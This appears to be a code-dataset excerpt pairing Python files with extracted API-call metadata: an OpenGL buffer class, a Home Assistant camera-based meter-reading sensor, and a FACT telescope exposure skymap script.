    @property
    def RendererID(self) -> int:
        """The OpenGL buffer handle."""
        return self.__RendererID
    @property
    def Count(self) -> int:
        """Number of indices in the buffer."""
        return self.__Count
    def Bind(self) -> None:
        """Bind this buffer to GL_ELEMENT_ARRAY_BUFFER."""
        glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.__RendererID)
    def Unbind(self) -> None:
        """Unbind any buffer from GL_ELEMENT_ARRAY_BUFFER."""
        glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, 0)
| [
"OpenGL.GL.glBufferData",
"OpenGL.GL.glGenBuffers",
"numpy.array",
"numpy.zeros",
"multipledispatch.dispatch",
"ctypes.c_void_p",
"OpenGL.GL.glBindBuffer",
"OpenGL.GL.glDeleteBuffers"
] | [((451, 465), 'multipledispatch.dispatch', 'dispatch', (['list'], {}), '(list)\n', (459, 465), False, 'from multipledispatch import dispatch\n'), ((815, 828), 'multipledispatch.dispatch', 'dispatch', (['int'], {}), '(int)\n', (823, 828), False, 'from multipledispatch import dispatch\n'), ((545, 581), 'numpy.array', 'np.array', (['vertices'], {'dtype': 'np.float32'}), '(vertices, dtype=np.float32)\n', (553, 581), True, 'import numpy as np\n'), ((655, 670), 'OpenGL.GL.glGenBuffers', 'glGenBuffers', (['(1)'], {}), '(1)\n', (667, 670), False, 'from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((679, 727), 'OpenGL.GL.glBindBuffer', 'glBindBuffer', (['GL_ARRAY_BUFFER', 'self.__RendererID'], {}), '(GL_ARRAY_BUFFER, self.__RendererID)\n', (691, 727), False, 'from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((736, 808), 'OpenGL.GL.glBufferData', 'glBufferData', (['GL_ARRAY_BUFFER', 'vertices.nbytes', 'vertices', 'GL_STATIC_DRAW'], {}), '(GL_ARRAY_BUFFER, vertices.nbytes, vertices, GL_STATIC_DRAW)\n', (748, 808), False, 'from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((891, 908), 'numpy.zeros', 'np.zeros', (['(size,)'], {}), '((size,))\n', (899, 908), True, 'import numpy as np\n'), ((969, 984), 'OpenGL.GL.glGenBuffers', 'glGenBuffers', (['(1)'], {}), '(1)\n', (981, 984), False, 'from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((993, 1041), 'OpenGL.GL.glBindBuffer', 'glBindBuffer', (['GL_ARRAY_BUFFER', 'self.__RendererID'], {}), '(GL_ARRAY_BUFFER, self.__RendererID)\n', (1005, 1041), False, 'from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((1177, 1216), 'OpenGL.GL.glDeleteBuffers', 'glDeleteBuffers', (['(1)', '[self.__RendererID]'], {}), '(1, [self.__RendererID])\n', (1192, 1216), False, 'from OpenGL.GL 
import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((1412, 1460), 'OpenGL.GL.glBindBuffer', 'glBindBuffer', (['GL_ARRAY_BUFFER', 'self.__RendererID'], {}), '(GL_ARRAY_BUFFER, self.__RendererID)\n', (1424, 1460), False, 'from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((1500, 1532), 'OpenGL.GL.glBindBuffer', 'glBindBuffer', (['GL_ARRAY_BUFFER', '(0)'], {}), '(GL_ARRAY_BUFFER, 0)\n', (1512, 1532), False, 'from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((1678, 1726), 'OpenGL.GL.glBindBuffer', 'glBindBuffer', (['GL_ARRAY_BUFFER', 'self.__RendererID'], {}), '(GL_ARRAY_BUFFER, self.__RendererID)\n', (1690, 1726), False, 'from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((2045, 2079), 'numpy.array', 'np.array', (['indices'], {'dtype': 'np.uint32'}), '(indices, dtype=np.uint32)\n', (2053, 2079), True, 'import numpy as np\n'), ((2145, 2160), 'OpenGL.GL.glGenBuffers', 'glGenBuffers', (['(1)'], {}), '(1)\n', (2157, 2160), False, 'from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((2189, 2267), 'OpenGL.GL.glBufferData', 'glBufferData', (['GL_ELEMENT_ARRAY_BUFFER', 'indices.nbytes', 'indices', 'GL_STATIC_DRAW'], {}), '(GL_ELEMENT_ARRAY_BUFFER, indices.nbytes, indices, GL_STATIC_DRAW)\n', (2201, 2267), False, 'from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((2308, 2347), 'OpenGL.GL.glDeleteBuffers', 'glDeleteBuffers', (['(1)', '[self.__RendererID]'], {}), '(1, [self.__RendererID])\n', (2323, 2347), False, 'from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((2537, 2593), 'OpenGL.GL.glBindBuffer', 'glBindBuffer', (['GL_ELEMENT_ARRAY_BUFFER', 'self.__RendererID'], {}), '(GL_ELEMENT_ARRAY_BUFFER, self.__RendererID)\n', (2549, 2593), 
False, 'from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((2633, 2673), 'OpenGL.GL.glBindBuffer', 'glBindBuffer', (['GL_ELEMENT_ARRAY_BUFFER', '(0)'], {}), '(GL_ELEMENT_ARRAY_BUFFER, 0)\n', (2645, 2673), False, 'from OpenGL.GL import glGenBuffers, glBufferData, glDeleteBuffers, glBindBuffer, glBufferSubData\n'), ((1097, 1118), 'ctypes.c_void_p', 'ctypes.c_void_p', (['None'], {}), '(None)\n', (1112, 1118), False, 'import ctypes\n')] |
"""Meter Parser Image Processing component and sensor."""
# Copyright 2021 <NAME>
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import datetime
import logging
import os
import numpy
import traceback
import voluptuous as vol
from homeassistant.components.sensor import (
STATE_CLASS_TOTAL_INCREASING,
SensorEntity,
SensorEntityDescription,
)
from homeassistant.helpers.restore_state import RestoreEntity
from homeassistant.util import slugify
from .parser_dial import parse_dials
from .parser_digits import parse_digits
from .image_utils import zoom_to_roi
from homeassistant.components.image_processing import (
CONF_ENTITY_ID,
CONF_NAME,
PLATFORM_SCHEMA,
ImageProcessingEntity,
)
from homeassistant.const import (
ATTR_ENTITY_ID,
CONF_DEVICE_CLASS,
CONF_SOURCE,
CONF_UNIT_OF_MEASUREMENT,
DEVICE_CLASS_ENERGY,
DEVICE_CLASS_GAS,
DEVICE_CLASS_POWER,
ENERGY_KILO_WATT_HOUR,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
)
from homeassistant.components.light import (
DOMAIN as DOMAIN_LIGHT,
)
from homeassistant.components.camera import (
DOMAIN as DOMAIN_CAMERA,
ENTITY_ID_FORMAT,
)
from homeassistant.core import HomeAssistant, callback, split_entity_id
from homeassistant.helpers import entity_registry as er
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import (
generate_entity_id,
)
from homeassistant.helpers.event import async_call_later
from .const import (
ALLOWED_DEVICE_CLASSES,
ATTRIBUTION,
CONF_DEBUG,
CONF_DECIMALS_COUNT,
CONF_DIAL_SIZE,
CONF_DIALS,
CONF_DIGITS_COUNT,
CONF_METERTYPE,
CONF_OCR_API_KEY,
DEVICE_CLASS_WATER,
DIAL_DEFAULT_READOUT,
DOMAIN,
ICON_ELECTRICITY,
ICON_GAS,
ICON_WATER,
METERTYPEDIALS,
METERTYPEDIGITS,
METERTYPES,
UNITS_OF_MEASUREMENT,
CONF_LIGHT_ENTITY_ID,
)
# One camera source entry: required camera entity plus an optional friendly
# name and an optional light that is switched on while taking the snapshot.
SOURCE_SCHEMA = vol.Schema(
    {
        vol.Required(CONF_ENTITY_ID): cv.entity_domain(DOMAIN_CAMERA),
        vol.Optional(CONF_NAME): cv.string,
        vol.Optional(CONF_LIGHT_ENTITY_ID): cv.entity_domain(DOMAIN_LIGHT),
    }
)
# Platform configuration: camera sources, meter type (dials or digits),
# parsing options and the resulting sensor's device class / unit.
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
    {
        vol.Required(CONF_SOURCE): vol.All(cv.ensure_list, [SOURCE_SCHEMA]),
        vol.Required(CONF_METERTYPE): vol.In(METERTYPES),
        vol.Optional(CONF_OCR_API_KEY): cv.string,
        vol.Optional(CONF_DIGITS_COUNT, default=6): cv.positive_int,
        vol.Optional(CONF_DECIMALS_COUNT, default=0): cv.positive_int,
        vol.Optional(CONF_DEBUG, default=False): cv.boolean,
        vol.Required(CONF_DEVICE_CLASS): vol.In(ALLOWED_DEVICE_CLASSES),
        vol.Required(CONF_UNIT_OF_MEASUREMENT): vol.In(UNITS_OF_MEASUREMENT),
        vol.Optional(CONF_DIALS): cv.ensure_list,
        vol.Optional(CONF_DIAL_SIZE, default=100): cv.positive_int,
    }
)
try:
    # Verify that the OpenCV python package is pre-installed
    import cv2
    CV2_IMPORTED = True
except ImportError:
    CV2_IMPORTED = False
_LOGGER: logging.Logger = logging.getLogger(__package__)
async def async_setup_platform(
    hass: HomeAssistant, config: dict, async_add_entities, discovery_info=None
):
    """Set up the Meter Parser platform."""
    if not CV2_IMPORTED:
        _LOGGER.error(
            "No OpenCV library found! Install or compile for your system "
            "following instructions here: http://opencv.org/releases.html"
        )
        return
    # One measurement entity per configured camera source.
    entities = [
        MeterParserMeasurementEntity(
            hass,
            config,
            source.get(CONF_ENTITY_ID),
            source.get(CONF_LIGHT_ENTITY_ID),
            source.get(CONF_NAME),
        )
        for source in config[CONF_SOURCE]
    ]
    async_add_entities(entities)
class MeterParserMeasurementEntity(ImageProcessingEntity, SensorEntity, RestoreEntity):
    """Measurement entity.

    Grabs snapshots from a camera, parses the meter reading (dials or
    digits) with OpenCV, and exposes it as a total-increasing sensor whose
    last value survives restarts (via RestoreEntity).
    """
    def __init__(
        self,
        hass: HomeAssistant,
        config: dict,
        entity_id: str,
        light_entity_id: str,
        entity_name: str,
    ):
        """Initialize."""
        super().__init__()
        self.hass = hass
        # Minimum confidence threshold exposed via the `confidence` property.
        self._confidence = 0.7
        self._camera = entity_id
        self._light = light_entity_id
        self._debug: bool = bool(config[CONF_DEBUG] if CONF_DEBUG in config else False)
        self._debug_path = hass.config.path("debug/" + DOMAIN) if self._debug else None
        self._error_count = 0
        # Create the debug output directory on first use.
        if self._debug_path is not None and not os.path.exists(self._debug_path):
            os.makedirs(self._debug_path)
        if entity_name:
            self._attr_name = entity_name
        else:
            self._attr_name = f"Unnamed Meter {split_entity_id(self._camera)[1]}"
        self._attr_unique_id = generate_entity_id(
            "sensor.{}_" + STATE_CLASS_TOTAL_INCREASING,
            self._attr_name,
            hass=hass,
        )
        device_class = (
            config[CONF_DEVICE_CLASS]
            if CONF_DEVICE_CLASS in config
            else DEVICE_CLASS_POWER
        )
        self.entity_description = SensorEntityDescription(
            key=STATE_CLASS_TOTAL_INCREASING,
            name=self._attr_name,
            state_class=STATE_CLASS_TOTAL_INCREASING,
            device_class=device_class,
            native_unit_of_measurement=config[CONF_UNIT_OF_MEASUREMENT]
            if CONF_UNIT_OF_MEASUREMENT in config
            else ENERGY_KILO_WATT_HOUR,
        )
        # Pick an icon matching the configured device class.
        if device_class == DEVICE_CLASS_POWER or device_class == DEVICE_CLASS_ENERGY:
            self.entity_description.icon = ICON_ELECTRICITY
        elif device_class == DEVICE_CLASS_GAS:
            self.entity_description.icon = ICON_GAS
        elif device_class == DEVICE_CLASS_WATER:
            self.entity_description.icon = ICON_WATER
        self._metertype: str = (
            config[CONF_METERTYPE] if CONF_METERTYPE in config else METERTYPEDIALS
        )
        self._dials: list[str] = (
            config[CONF_DIALS] if CONF_DIALS in config else DIAL_DEFAULT_READOUT
        )
        self._dial_size = int(
            config[CONF_DIAL_SIZE] if CONF_DIAL_SIZE in config else 100
        )
        self._digits: int = int(
            config[CONF_DIGITS_COUNT] if CONF_DIGITS_COUNT in config else 0
        )
        self._decimals: int = int(
            config[CONF_DECIMALS_COUNT] if CONF_DECIMALS_COUNT in config else 0
        )
        self._ocr_key: str = (
            config[CONF_OCR_API_KEY] if CONF_OCR_API_KEY in config else ""
        )
        # self._ocr_url: str = (
        #     config[CONF_OCR_API_URL] if CONF_OCR_API_URL in config else ""
        # )
        # NOTE(review): annotation names the `datetime` module, not the
        # `datetime.datetime` class; the value is a datetime once set.
        self._last_update_success: datetime = None
    def _set_attributes(self):
        # Expose meter type and the last successful parse time as attributes.
        self._attr_extra_state_attributes = {
            CONF_METERTYPE: self._metertype,
            "last_update": self._last_update_success,
        }
    @property
    def confidence(self):
        """Return minimum confidence for send events."""
        return self._confidence
    @property
    def camera_entity(self):
        """Return camera entity id from process pictures."""
        return self._camera
    async def async_added_to_hass(self) -> None:
        """Handle entity which will be added."""
        await super().async_added_to_hass()
        # Restore the last known reading so the total-increasing sensor
        # does not reset across Home Assistant restarts.
        last_state = await self.async_get_last_state()
        if last_state is not None and last_state.state != "unknown":
            self._attr_state = last_state.state
            self._attr_native_value = last_state.state
    # def _handle_event(self, event):
    #     device_id = ENTITY_ID_FORMAT.format(slugify(event.data.get("device_name")))
    #     _LOGGER.debug("Got esphome.device_alive event for %s" % device_id)
    #     if self._camera == device_id:
    #         asyncio.run_coroutine_threadsafe(self.async_update(), self.hass.loop)
    #     return
    async def async_update(self):
        """First turn the led on to grab an image"""
        if self._light is not None:
            _LOGGER.debug("Turning on %s" % self._light)
            await self.hass.services.async_call(
                DOMAIN_LIGHT,
                SERVICE_TURN_ON,
                {ATTR_ENTITY_ID: self._light},
            )
            # Give the light 1.5 s to illuminate the meter before grabbing
            # the snapshot; always turn the light back off afterwards.
            @callback
            async def call_later(*_):
                try:
                    _LOGGER.debug("Taking a snapshot from %s..." % self.entity_id)
                    await super(MeterParserMeasurementEntity, self).async_update()
                except Exception:
                    _LOGGER.error(traceback.format_exc())
                finally:
                    _LOGGER.debug("Turning off %s" % self._light)
                    await self.hass.services.async_call(
                        DOMAIN_LIGHT,
                        SERVICE_TURN_OFF,
                        {ATTR_ENTITY_ID: self._light},
                    )
            async_call_later(self.hass, 1.5, call_later)
        else:
            try:
                _LOGGER.debug("Taking a snapshot from %s..." % self.entity_id)
                await super(MeterParserMeasurementEntity, self).async_update()
            except Exception:
                _LOGGER.error(traceback.format_exc())
    async def async_process_image(self, image):
        """Process image."""
        # Heavy OpenCV work runs in the executor to keep the event loop free.
        await self.hass.async_add_executor_job(self.process_image, image)
        if self._attr_attribution is None:
            registry = er.async_get(self.hass)
            entry = registry.entities.get(self._camera)
            self._attr_attribution = ATTRIBUTION % (
                entry.name if entry is not None else split_entity_id(self._camera)[1]
            )
    def process_image(self, image):
        """Update data via opencv."""
        reading = 0
        prev_reading = 0
        _LOGGER.debug("Processing image...")
        try:
            # Decode the raw snapshot bytes and crop to the region of interest.
            cv_image = cv2.imdecode(
                numpy.asarray(bytearray(image)), cv2.IMREAD_UNCHANGED
            )
            cv_image = zoom_to_roi(cv_image)
            if self._metertype == METERTYPEDIALS:
                reading = float(
                    parse_dials(
                        cv_image,
                        readout=self._dials,
                        decimals_count=self._decimals,
                        entity_id=self._attr_unique_id,
                        minDiameter=self._dial_size,
                        maxDiameter=self._dial_size + 250,
                        debug_path=self._debug_path,
                    )
                )
            elif self._metertype == METERTYPEDIGITS:
                reading = float(
                    parse_digits(
                        cv_image,
                        self._digits,
                        self._decimals,
                        self._ocr_key,
                        # self._ocr_url,
                        self._attr_unique_id,
                        debug_path=self._debug_path,
                    )
                )
        except Exception:
            _LOGGER.error(traceback.format_exc())
        # NOTE(review): str.isnumeric() is False for strings containing '.',
        # so a previously stored decimal reading leaves prev_reading at 0 and
        # bypasses the monotonicity check below — confirm intended.
        if self._attr_native_value is not None and str(self._attr_native_value).isnumeric():
            prev_reading = float(self._attr_native_value)
        if reading > 0:
            if reading >= prev_reading:
                # Accept only monotonically non-decreasing readings.
                self._attr_state = reading
                self._attr_native_value = reading
                self._last_update_success = datetime.datetime.now()
                self._attr_available = True
                self._error_count = 0
            else:
                self._error_count += 1
                # Mark unavailable after more than 10 consecutive failures.
                self._attr_available = False if self._error_count > 10 else True
                _LOGGER.error(
                    "New reading is less than current reading. Got your meter replaced? Reset this integration."
                )
        else:
            self._error_count += 1
            self._attr_available = False if self._error_count > 10 else True
        self._set_attributes()
| [
"logging.getLogger",
"homeassistant.helpers.entity.generate_entity_id",
"voluptuous.Required",
"os.path.exists",
"traceback.format_exc",
"homeassistant.core.split_entity_id",
"os.makedirs",
"homeassistant.components.sensor.SensorEntityDescription",
"homeassistant.helpers.entity_registry.async_get",
... | [((3565, 3595), 'logging.getLogger', 'logging.getLogger', (['__package__'], {}), '(__package__)\n', (3582, 3595), False, 'import logging\n'), ((2482, 2510), 'voluptuous.Required', 'vol.Required', (['CONF_ENTITY_ID'], {}), '(CONF_ENTITY_ID)\n', (2494, 2510), True, 'import voluptuous as vol\n'), ((2553, 2576), 'voluptuous.Optional', 'vol.Optional', (['CONF_NAME'], {}), '(CONF_NAME)\n', (2565, 2576), True, 'import voluptuous as vol\n'), ((2597, 2631), 'voluptuous.Optional', 'vol.Optional', (['CONF_LIGHT_ENTITY_ID'], {}), '(CONF_LIGHT_ENTITY_ID)\n', (2609, 2631), True, 'import voluptuous as vol\n'), ((2512, 2543), 'homeassistant.helpers.config_validation.entity_domain', 'cv.entity_domain', (['DOMAIN_CAMERA'], {}), '(DOMAIN_CAMERA)\n', (2528, 2543), True, 'import homeassistant.helpers.config_validation as cv\n'), ((2633, 2663), 'homeassistant.helpers.config_validation.entity_domain', 'cv.entity_domain', (['DOMAIN_LIGHT'], {}), '(DOMAIN_LIGHT)\n', (2649, 2663), True, 'import homeassistant.helpers.config_validation as cv\n'), ((2730, 2755), 'voluptuous.Required', 'vol.Required', (['CONF_SOURCE'], {}), '(CONF_SOURCE)\n', (2742, 2755), True, 'import voluptuous as vol\n'), ((2807, 2835), 'voluptuous.Required', 'vol.Required', (['CONF_METERTYPE'], {}), '(CONF_METERTYPE)\n', (2819, 2835), True, 'import voluptuous as vol\n'), ((2865, 2895), 'voluptuous.Optional', 'vol.Optional', (['CONF_OCR_API_KEY'], {}), '(CONF_OCR_API_KEY)\n', (2877, 2895), True, 'import voluptuous as vol\n'), ((2916, 2958), 'voluptuous.Optional', 'vol.Optional', (['CONF_DIGITS_COUNT'], {'default': '(6)'}), '(CONF_DIGITS_COUNT, default=6)\n', (2928, 2958), True, 'import voluptuous as vol\n'), ((2985, 3029), 'voluptuous.Optional', 'vol.Optional', (['CONF_DECIMALS_COUNT'], {'default': '(0)'}), '(CONF_DECIMALS_COUNT, default=0)\n', (2997, 3029), True, 'import voluptuous as vol\n'), ((3056, 3095), 'voluptuous.Optional', 'vol.Optional', (['CONF_DEBUG'], {'default': '(False)'}), '(CONF_DEBUG, 
default=False)\n', (3068, 3095), True, 'import voluptuous as vol\n'), ((3117, 3148), 'voluptuous.Required', 'vol.Required', (['CONF_DEVICE_CLASS'], {}), '(CONF_DEVICE_CLASS)\n', (3129, 3148), True, 'import voluptuous as vol\n'), ((3190, 3228), 'voluptuous.Required', 'vol.Required', (['CONF_UNIT_OF_MEASUREMENT'], {}), '(CONF_UNIT_OF_MEASUREMENT)\n', (3202, 3228), True, 'import voluptuous as vol\n'), ((3268, 3292), 'voluptuous.Optional', 'vol.Optional', (['CONF_DIALS'], {}), '(CONF_DIALS)\n', (3280, 3292), True, 'import voluptuous as vol\n'), ((3318, 3359), 'voluptuous.Optional', 'vol.Optional', (['CONF_DIAL_SIZE'], {'default': '(100)'}), '(CONF_DIAL_SIZE, default=100)\n', (3330, 3359), True, 'import voluptuous as vol\n'), ((2757, 2797), 'voluptuous.All', 'vol.All', (['cv.ensure_list', '[SOURCE_SCHEMA]'], {}), '(cv.ensure_list, [SOURCE_SCHEMA])\n', (2764, 2797), True, 'import voluptuous as vol\n'), ((2837, 2855), 'voluptuous.In', 'vol.In', (['METERTYPES'], {}), '(METERTYPES)\n', (2843, 2855), True, 'import voluptuous as vol\n'), ((3150, 3180), 'voluptuous.In', 'vol.In', (['ALLOWED_DEVICE_CLASSES'], {}), '(ALLOWED_DEVICE_CLASSES)\n', (3156, 3180), True, 'import voluptuous as vol\n'), ((3230, 3258), 'voluptuous.In', 'vol.In', (['UNITS_OF_MEASUREMENT'], {}), '(UNITS_OF_MEASUREMENT)\n', (3236, 3258), True, 'import voluptuous as vol\n'), ((5337, 5433), 'homeassistant.helpers.entity.generate_entity_id', 'generate_entity_id', (["('sensor.{}_' + STATE_CLASS_TOTAL_INCREASING)", 'self._attr_name'], {'hass': 'hass'}), "('sensor.{}_' + STATE_CLASS_TOTAL_INCREASING, self.\n _attr_name, hass=hass)\n", (5355, 5433), False, 'from homeassistant.helpers.entity import generate_entity_id\n'), ((5664, 5957), 'homeassistant.components.sensor.SensorEntityDescription', 'SensorEntityDescription', ([], {'key': 'STATE_CLASS_TOTAL_INCREASING', 'name': 'self._attr_name', 'state_class': 'STATE_CLASS_TOTAL_INCREASING', 'device_class': 'device_class', 'native_unit_of_measurement': 
'(config[CONF_UNIT_OF_MEASUREMENT] if CONF_UNIT_OF_MEASUREMENT in config else\n ENERGY_KILO_WATT_HOUR)'}), '(key=STATE_CLASS_TOTAL_INCREASING, name=self.\n _attr_name, state_class=STATE_CLASS_TOTAL_INCREASING, device_class=\n device_class, native_unit_of_measurement=config[\n CONF_UNIT_OF_MEASUREMENT] if CONF_UNIT_OF_MEASUREMENT in config else\n ENERGY_KILO_WATT_HOUR)\n', (5687, 5957), False, 'from homeassistant.components.sensor import STATE_CLASS_TOTAL_INCREASING, SensorEntity, SensorEntityDescription\n'), ((5112, 5141), 'os.makedirs', 'os.makedirs', (['self._debug_path'], {}), '(self._debug_path)\n', (5123, 5141), False, 'import os\n'), ((9461, 9505), 'homeassistant.helpers.event.async_call_later', 'async_call_later', (['self.hass', '(1.5)', 'call_later'], {}), '(self.hass, 1.5, call_later)\n', (9477, 9505), False, 'from homeassistant.helpers.event import async_call_later\n'), ((9997, 10020), 'homeassistant.helpers.entity_registry.async_get', 'er.async_get', (['self.hass'], {}), '(self.hass)\n', (10009, 10020), True, 'from homeassistant.helpers import entity_registry as er\n'), ((5066, 5098), 'os.path.exists', 'os.path.exists', (['self._debug_path'], {}), '(self._debug_path)\n', (5080, 5098), False, 'import os\n'), ((11966, 11989), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (11987, 11989), False, 'import datetime\n'), ((11589, 11611), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (11609, 11611), False, 'import traceback\n'), ((5270, 5299), 'homeassistant.core.split_entity_id', 'split_entity_id', (['self._camera'], {}), '(self._camera)\n', (5285, 5299), False, 'from homeassistant.core import HomeAssistant, callback, split_entity_id\n'), ((9755, 9777), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (9775, 9777), False, 'import traceback\n'), ((10183, 10212), 'homeassistant.core.split_entity_id', 'split_entity_id', (['self._camera'], {}), '(self._camera)\n', (10198, 10212), False, 'from 
homeassistant.core import HomeAssistant, callback, split_entity_id\n'), ((9119, 9141), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (9139, 9141), False, 'import traceback\n')] |
from irf import estimate_exposure_time, build_exposure_map
import click
import fact.io as fio
import pandas as pd
from astroquery.skyview import SkyView
from astropy.wcs import WCS
from astropy.visualization import ImageNormalize, ZScaleInterval, AsinhStretch
import astropy.units as u
from astropy.coordinates import SkyCoord
import matplotlib.pyplot as plt
@u.quantity_input(fov=u.deg)
def get_sdss_sky_image(img_center, fov=9 * u.deg, n_pix=1000):
'''
A small helper method which uses astroquery to get an image from the sdss.
This requires internet access and fails pretty often due to http timeouts.
'''
hdu = SkyView.get_images(
position=img_center,
pixels=n_pix,
survey=['DSS'],
width=fov,
height=fov)[0][0]
img = hdu.data
wcs = WCS(hdu.header)
return img, wcs
@click.command()
@click.argument(
'dl3_path',
type=click.Path(file_okay=True, dir_okay=False),
)
@click.argument(
'output_path',
type=click.Path(file_okay=True, dir_okay=False, exists=False),
)
@click.option(
'-n',
'--n_pix',
default=1000,
help='number of pixels along the edge of the produced image',
)
@click.option(
'-s',
'--source_name',
default=None,
help=
'If supplied, e.g. "Crab Nebula" will draw the position of that source into the image',
)
@click.option(
'--background/--no-background',
default=True,
help='If true, downloads SDSS image for backgrund image in the plot')
def main(dl3_path, output_path, n_pix, source_name, background):
'''
Takes FACT dl3 output and plots a skymap which is being saved to the output_path.
'''
runs = fio.read_data(dl3_path, key='runs')
dl3 = fio.read_data(dl3_path, key='events')
data = pd.merge(runs, dl3, on=['run_id', 'night'])
timestamps = pd.to_datetime(data.timestamp).values
total_ontime = estimate_exposure_time(timestamps)
print('Total estimated exposure time: {}'.format(total_ontime.to(u.h)))
ra_pointing = data.right_ascension.values * u.hourangle
dec_pointing = data.declination.values * u.deg
pointing = SkyCoord(ra=ra_pointing, dec=dec_pointing)
img = None
wcs = None
if background:
img_center = SkyCoord(ra=pointing.ra.mean(), dec=pointing.dec.mean())
img, wcs = get_sdss_sky_image(
img_center=img_center, n_pix=n_pix, fov=9 * u.deg)
mask, wcs = build_exposure_map(pointing, timestamps, shape=(n_pix, n_pix))
ax = plot_exposure(mask, wcs, image=img)
if source_name:
source = SkyCoord.from_name('Crab Nebula')
ax.scatter(
source.ra.deg,
source.dec.deg,
transform=ax.get_transform('icrs'),
label=source_name,
s=10**2,
facecolors='none',
edgecolors='r',
)
ax.legend()
plt.savefig(output_path, dpi=200)
def plot_exposure(mask, wcs, image=None):
plt.figure(figsize=(10, 10))
ax = plt.subplot(projection=wcs)
if image is not None:
norm = ImageNormalize(
image,
interval=ZScaleInterval(contrast=0.05),
stretch=AsinhStretch(a=0.2))
ax.imshow(image, cmap='gray', norm=norm, interpolation='nearest')
d = ax.imshow(mask, alpha=0.7)
cb = plt.colorbar(d)
cb.set_label('Live Time / Hours')
ax.set_xlabel('Galactic Longitude')
ax.set_ylabel('Galactic Latitude')
return ax
if __name__ == '__main__':
main()
| [
"astropy.visualization.AsinhStretch",
"astroquery.skyview.SkyView.get_images",
"pandas.to_datetime",
"astropy.units.quantity_input",
"click.option",
"click.command",
"fact.io.read_data",
"matplotlib.pyplot.savefig",
"astropy.coordinates.SkyCoord.from_name",
"pandas.merge",
"irf.estimate_exposure... | [((363, 390), 'astropy.units.quantity_input', 'u.quantity_input', ([], {'fov': 'u.deg'}), '(fov=u.deg)\n', (379, 390), True, 'import astropy.units as u\n'), ((847, 862), 'click.command', 'click.command', ([], {}), '()\n', (860, 862), False, 'import click\n'), ((1057, 1167), 'click.option', 'click.option', (['"""-n"""', '"""--n_pix"""'], {'default': '(1000)', 'help': '"""number of pixels along the edge of the produced image"""'}), "('-n', '--n_pix', default=1000, help=\n 'number of pixels along the edge of the produced image')\n", (1069, 1167), False, 'import click\n'), ((1183, 1335), 'click.option', 'click.option', (['"""-s"""', '"""--source_name"""'], {'default': 'None', 'help': '"""If supplied, e.g. "Crab Nebula" will draw the position of that source into the image"""'}), '(\'-s\', \'--source_name\', default=None, help=\n \'If supplied, e.g. "Crab Nebula" will draw the position of that source into the image\'\n )\n', (1195, 1335), False, 'import click\n'), ((1351, 1484), 'click.option', 'click.option', (['"""--background/--no-background"""'], {'default': '(True)', 'help': '"""If true, downloads SDSS image for backgrund image in the plot"""'}), "('--background/--no-background', default=True, help=\n 'If true, downloads SDSS image for backgrund image in the plot')\n", (1363, 1484), False, 'import click\n'), ((808, 823), 'astropy.wcs.WCS', 'WCS', (['hdu.header'], {}), '(hdu.header)\n', (811, 823), False, 'from astropy.wcs import WCS\n'), ((1671, 1706), 'fact.io.read_data', 'fio.read_data', (['dl3_path'], {'key': '"""runs"""'}), "(dl3_path, key='runs')\n", (1684, 1706), True, 'import fact.io as fio\n'), ((1717, 1754), 'fact.io.read_data', 'fio.read_data', (['dl3_path'], {'key': '"""events"""'}), "(dl3_path, key='events')\n", (1730, 1754), True, 'import fact.io as fio\n'), ((1767, 1810), 'pandas.merge', 'pd.merge', (['runs', 'dl3'], {'on': "['run_id', 'night']"}), "(runs, dl3, on=['run_id', 'night'])\n", (1775, 1810), True, 'import pandas 
